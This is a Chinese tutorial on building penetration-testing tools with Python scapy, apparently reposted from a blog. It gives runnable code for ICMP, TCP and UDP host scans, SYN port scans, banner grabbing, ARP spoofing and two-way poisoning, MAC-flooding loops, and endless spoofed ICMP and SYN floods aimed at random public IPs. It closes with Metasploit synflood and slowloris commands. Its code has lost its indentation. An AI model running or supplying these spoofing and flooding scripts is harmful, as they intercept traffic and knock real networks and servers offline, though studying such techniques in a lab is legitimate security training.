15.渗透测试工具编程
作者:互联网
ICMP
scapy基本操作
前期准备
在Linux中使用pycharm进行接下来的操作,以便帮我们实现网络底层功能
去pycharm官网下载pycharm的Linux版本
将pycharm的压缩包放在/root目录下,解压tar -zxvf pycharm-community-2022.1.tar.gz ,进入bin目录并打开命令行,输入./pycharm.sh 启动pycharm
所有的操作和Windows没有区别,去settings中安装scapy包
最好把网络环境换成同一个网段
scapy测试命令行
scapy可以在命令行中直接输入scapy开启一个测试命令行
构造数据包
构造OSI第三层(网络层)数据包ping向目标
ip=IP(dst="192.168.223.153")
ip //显示数据包
构造OSI第二层(数据链路层)的广播数据包
Ether(dst="ff:ff:ff:ff:ff:ff")
发送数据包
构造IP类ping包向192.168.223.153发送ICMP协议的数据包
send(IP(dst="192.168.223.153")/ICMP())
只发不收
向192.168.223.153发送数据包并随意填写数据
IP(dst="192.168.223.153")/fuzz(TCP())
发送后开始监听以接收回包,接收不到会一直监听
sr(IP(dst="192.168.223.153")/ICMP())
接收回包的函数:sr,sr1,srp
构造IP类ping包基于TCP进行syn半开放扫描针对192.168.223.153的80端口
sr1(IP(dst="192.168.223.153")/TCP(dport=80,flags="S"))
构造icmp扫描进行信息搜集
安装python的python-whois包
通过whois包获取whois信息
from whois import whois
def main():
# 请求百度域名的信息
data = whois("www.baidu.com")
# 直接使用python进行域名解析
ip = socket.gethostbyname("www.baidu.com")
if __name__ == '__main__':
main()
构造ICMP数据包扫描
法一:通过随机端口、icmp进程id以及包数用来伪装以进行icmp扫描
from scapy.all import *
from random import randint
def main():
# 随机扫描一个端口
ip_id = randint(1, 65535)
# icmp的进程ID
icmp_id = randint(1, 65535)
# ping到第几个包
icmp_seq = randint(1, 65535)
# ttl:time_to_life,每过一台路由器,ttl值-1;最后随便加个字符
packet = IP(dst="192.168.223.233", ttl=64, id=ip_id) / ICMP(id=icmp_id, seq=icmp_seq) / b'rootkit'
# verbose:是否输出详细信息
result = sr1(packet, timeout=1, verbose=False)
# 如果IP不存在就没有回包,result里面就没有数据
if result:
for rcv in result:
# 将扫描对象的IP输出
scan_ip = rcv[IP].src
print(scan_ip + " is alive")
else:
print("is down")
if __name__ == '__main__':
main()
法二:不添加参数的简单的ICMP扫描
from scapy.all import *
def main():
# 构造一个基于IP的ICMP数据包,并使用sr有去有回输出到ans和uans,但重要数据都在ans中
ans,uans = sr(IP(dst="192.168.223.153")/ICMP())
# 对ans收到两个参数通过send和receive接收
for snd,rcv in ans:
# 打印接收的IP地址
print(rcv.sprintf("%IP.src% is alive now"))
if __name__ == '__main__':
main()
TCP和UDP
判断主机存活
TCP扫描
from scapy.all import *
from random import randint
import time
def main():
ip = "192.168.223.153"
dport = randint(1, 65535)
packet = IP(dst=ip) / TCP(flags="A", dport=dport)
response = sr1(packet, timeout=1.0, verbose=0)
if response:
# RST标志位
if int(response[TCP].flags) == 4:
time.sleep(0.5)
print(ip + " is up")
else:
print(ip + " is down")
else:
print(ip + " is down")
UDP扫描
def main():
ip = "192.168.223.153"
ans, uans = sr(IP(dst=ip) / UDP(dport=80))
for snd, rcv in ans:
print(rcv.sprintf("%IP.src% is up"))
端口扫描
TCP全开放
建立TCP三次握手:给目标发送SYN请求,返回SYN+ACK,收到后返回主机ACK才能成功TCP连接
利用完整的TCP三次握手实现端口扫描,容易防火墙被记录
def main():
ip = '192.168.223.153'
port = 80
# 给用户发送syn请求,基于IP和TCP的,源端口为12345,端口为选中的端口,发送syn请求
packet = IP(dst=ip) / TCP(sport=12345, dport=port, flags="S")
# 让数据包有来有回,如果20s没有回复就当die了
resp = sr1(packet, timeout=20)
# 如果回包什么都没有,意味主机死亡
if str(type(resp)) == "<type 'NoneType'>":
print("port %s is closed" % port)
# 如果有回复,判断内容
elif resp.haslayer(TCP):
# 如果内容头部是0x12(允许连接)
if resp.getlayer(TCP).flags == 0x12:
# 收到回复,发送ack回包,之后判断是open
send_rst = sr(IP(dst=ip) / TCP(sport=12345, dport=port, flags="AR"), timeout=20)
print("port %s is open" % port)
# 如果头部是0x14(拒绝连接),判断是down
elif resp.getlayer(TCP).flags == 0x14:
print("port %s is down" % port)
TCP半开放
TCP全开放扫描会被防火墙记录且最后一次握手没有用到,在目标返回SYN+ACK的时候就已经完成探测目的,没必要三次握手
def main():
ip = '192.168.223.153'
port = 80
packet = IP(dst=ip) / TCP(sport=12345, dport=port, flags="S")
resp = sr1(packet, timeout=20)
if str(type(resp)) == "<type 'NoneType'>":
print("port %s is closed" % port)
elif resp.haslayer(TCP):
if resp.getlayer(TCP).flags == 0x12:
# 只需要将flags改成R,也就是回包就行,不需要ACK+SYN
send_rst = sr(IP(dst=ip) / TCP(sport=12345, dport=port, flags="R"), timeout=20)
print("port %s is open" % port)
elif resp.getlayer(TCP).flags == 0x14:
print("port %s is down" % port)
服务器banner扫描
不知道开放的端口的作用,但可以直接对他进行socket(套接字)连接
from scapy.all import *
def main():
ip = '192.168.223.153'
port = 3306
s = socket.socket()
s.connect((ip,port))
# 随便发送一个数据
s.send('Hello'.encode())
# 接收对方回包的banner
banner = s.recv(1024)
s.close()
# 对接收的数据进行格式化输出
print("banner is {}".format(banner))
以MySQL为例,会返回MySQL的banner,但是部分端口并不能返回
ARP
ARP欺骗
arpspoof实现(断网攻击)
选择网卡、目标IP和自己的网关IP,将自己伪装成网关进行欺骗
arpspoof -i eth0 -t 192.168.223.158 192.168.223.1
# 通过ifconfig查看自己的网卡
此时目标前往网关的流量都从kali走,没有设置流量从kali到网关,对方会断网
python实现
from scapy.all import *
import time
def main():
gatewayIP = '192.168.223.1'
victimIP = '192.168.223.153'
hackMAC = '00:0c:29:c6:a9:5d'
victimMAC = '00:0c:29:d6:ba:55'
# 通过IP获得受害主机的MAC地址
# print(getmacbyip('192.168.223.153'))
packet = Ether()/ARP(psrc=gatewayIP,pdst=victimIP)
while 1:
sendp(packet)
time.sleep(2)
print(packet.show())
数据包分析
###[ Ethernet ]###
dst = 00:0c:29:d6:ba:55 ---victim
src = 00:0c:29:c6:a9:5d ---hack
type = ARP
###[ ARP ]###
hwtype = 0x1
ptype = IPv4
hwlen = None
plen = None
op = who-has
hwsrc = 00:0c:29:c6:a9:5d ---hack
psrc = 192.168.223.1 ---gatewayIP
hwdst = 00:00:00:00:00:00
pdst = 192.168.223.153
None
op=1:说明这是一次arp请求
hwsrc、psrc:发送方MAC和IP地址,伪造成hack和网关
hwdst、pdst:报文接收方的MAC和IP地址
ARP双向毒化
arpspoof实现
打开Linux的数据转发功能
echo 1 >> /proc/sys/net/ipv4/ip_forward
目标数据包将从黑客服务器走,如果不转发出去对方就断网了,就会发现被攻击
arpspoof -i eth0 -t 192.168.223.153 192.168.223.1
arpspoof -i eth0 -t 192.168.223.1 192.168.223.153
此时目标流量从黑客走,黑客转发给网关,同时网关将流量发给黑客,黑客再转发给目标,实现双向毒化
python实现
from scapy.all import *
import time
def main():
gatewayIP = '192.168.223.1'
victimIP = '192.168.223.153'
hackMAC = '00:0c:29:c6:a9:5d'
victimMAC = '00:0c:29:d6:ba:55'
gatewayMAC = '00:50:56:c0:00:08'
# 获取网关MAC地址
# print(getmacbyip('192.168.223.1'))
# 从hack前往目标的流量在ARP包中让前往网关流量往hack走,op表示is-at,说明这是一次arp响应
packet1 = Ether(src=hackMAC, dst=victimMAC) / ARP(hwsrc=hackMAC, hwdst=victimMAC, psrc=gatewayIP, pdst=victimIP,op=2)
# # 从hack前往网关的流量在硬件层面被伪装成从目标到网关的流量,op表示is-at,说明这是一次arp响应
packet2 = Ether(src=hackMAC, dst=gatewayMAC) / ARP(hwsrc=hackMAC, hwdst=gatewayMAC, psrc=victimIP, pdst=gatewayIP,op=2)
while 1:
sendp(packet1, iface="eth0", verbose=False)
sendp(packet2, iface="eth0", verbose=False)
time.sleep(1)
print(packet1.show())
print(packet2.show())
op=2:说明这是一次arp响应
hwsrc、psrc:发送方MAC和IP地址,伪造成hack和网关
hwdst、pdst:报文接收方的MAC和IP地址
数据包分析
###[ Ethernet ]###
dst = 00:0c:29:d6:ba:55 ---victim
src = 00:0c:29:c6:a9:5d ---hack
type = ARP
###[ ARP ]###
hwtype = 0x1
ptype = IPv4
hwlen = None
plen = None
op = is-at
hwsrc = 00:0c:29:c6:a9:5d ---hackmac
psrc = 192.168.223.1 ---gatewayIP
hwdst = 00:0c:29:d6:ba:55
pdst = 192.168.223.153
None
###[ Ethernet ]###
dst = 00:50:56:c0:00:08 ---gateway
src = 00:0c:29:c6:a9:5d ---hack
type = ARP
###[ ARP ]###
hwtype = 0x1
ptype = IPv4
hwlen = None
plen = None
op = is-at
hwsrc = 00:0c:29:c6:a9:5d ---hackmac
psrc = 192.168.223.153 ---victimIP
hwdst = 00:50:56:c0:00:08
pdst = 192.168.223.1
None
流量
二层DOS(数据链路层)
OSI二层:需要进行交换机传输数据,交换机身上有MAC地址表,使得三层的IP地址和二层的MAC地址一一对应,同时为了转发数据,也会对应交换机的不同网卡接口,即IP—MAC—网卡接口(eth0)
MAC地址泛洪攻击原理:穷举MAC地址和IP地址导致交换机MAC地址表混乱,使得原有用户无法正常上网
法一(二+三层协议)
from scapy.all import *
import time
def main():
while 1:
# 在二层随机源和目标的MAC地址,在三层随机源和目标的IP地址,最后以ping包发送
packet = Ether(src=RandMAC(),dst=RandMAC())/IP(src=RandIP(),dst=RandIP())/ICMP()
time.sleep(0.5)
sendp(packet)
print(packet.summary())
法二(二层协议)
from scapy.all import *
import time
def main():
while 1:
# 直接走二层协议
packet = Ether(src=RandMAC(),dst=RandMAC())
time.sleep(0.5)
sendp(packet)
print(packet.summary())
法三(三层协议)
from scapy.all import *
import time
def main():
while 1:
# 直接走三层协议
packet = IP(src=RandIP(),dst=RandIP())/ICMP()
time.sleep(0.5)
sendp(packet)
print(packet.summary())
三层DOS(网络层)
from scapy.all import *
import time
from random import randint
def main():
while 1:
pdst = "%i.%i.%i.%i"%(randint(1,254),randint(1,254),randint(1,254),randint(1,254))
psrc = "192.168.82.99"
send(IP(src=psrc,dst=pdst)/ICMP())
time.sleep(0.5)
从内网一个不存在的地址ping向公网某个IP,当公网进行回复时路由器收到数据包向内网这个不存在的IP发送数据包,但无法收到,造成路由器拥塞
除了ICMP的ping包,也可以
四层DOS(传输层)
TCP连接建立
1.客户端对服务器发送syn请求(seq=x),进入syn_send状态
- 当随机目标服务器收到syn请求,回复路由器syn(seq=y)+ack(ack=x+1),进入syn_recv状态
3.当客户端收到服务器syn,回ack(ack=y+1),进入establish状态
python代码
from scapy.all import *
import time
from random import randint
def main():
while 1:
pdst = "%i.%i.%i.%i" % (randint(1, 254), randint(1, 254), randint(1, 254), randint(1, 254))
psrc = "192.168.82.99"
send(IP(src=psrc, dst=pdst) / TCP(dport=80, flags="S"))
time.sleep(0.5)
应用层DOS
msf的洪水攻击
msfconsole
use auxiliary/dos/tcp/synflood
# 根据options进行设置
show options
exploit
慢速攻击
原理:发送head长度和数据body的长度不一致时,对方网站就会等传输完毕,此时直接不管就可以一直耗对方服务器资源
pip install slowloris
slowloris [目标IP] -s 1500
标签:00,15,IP,dst,编程,TCP,192.168,测试工具,import 来源: https://www.cnblogs.com/icui4cu/p/16176133.html